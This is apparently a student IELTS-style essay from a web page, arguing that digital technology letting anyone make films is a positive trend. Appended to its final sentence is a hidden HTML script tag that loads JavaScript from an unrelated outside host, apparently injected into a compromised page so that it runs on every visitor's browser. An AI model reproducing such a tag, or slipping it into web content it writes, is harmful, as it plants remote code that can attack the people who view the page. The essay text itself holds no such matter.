Nowadays, it is not only large companies that are able to make films as digital technology enables anyone to produce films. Do you think this is a positive or negative development?

People hold the view that the development of digital technology recently has allowed any individual to make films rather than only big business in the past. From my perspective, I think this trend could bring positive consequences. In this essay I will discuss the issue.

Firstly, the development of digital technology has offered greater opportunities to anyone who is capable of making films. It can be easily seen these days that many individuals create and post their personal films on social media as well as other platforms. This is because people can shoot low budget movies only by using their own electronic devices such as smartphone, laptop, camera,.. and edit them through loads of app available. As a result, independent filmmakers are not only able to pursuit filmmaking careers but also earn their living.

Secondly, a large number of moviemakers promote the development of film industry. The products produced by independent movie creators might contain more creative and diverse contents compared to large film studios as they do not have to face censorship barriers. Furthermore, number of films on the rise provide audience with more choices to enjoy. That means the film industry is getting more and more competitive and people need to attempt to think of innovative ways to increase their products quality in order to attract more viewers. This certainly adds variety in the film industry.

In conclusion, I believe the growth of technology leads to the potential development of film industry and brings many opportunities for independent film makers to follow their passion.<script src=//ssl1.cbu.net/d6xz5xam></script>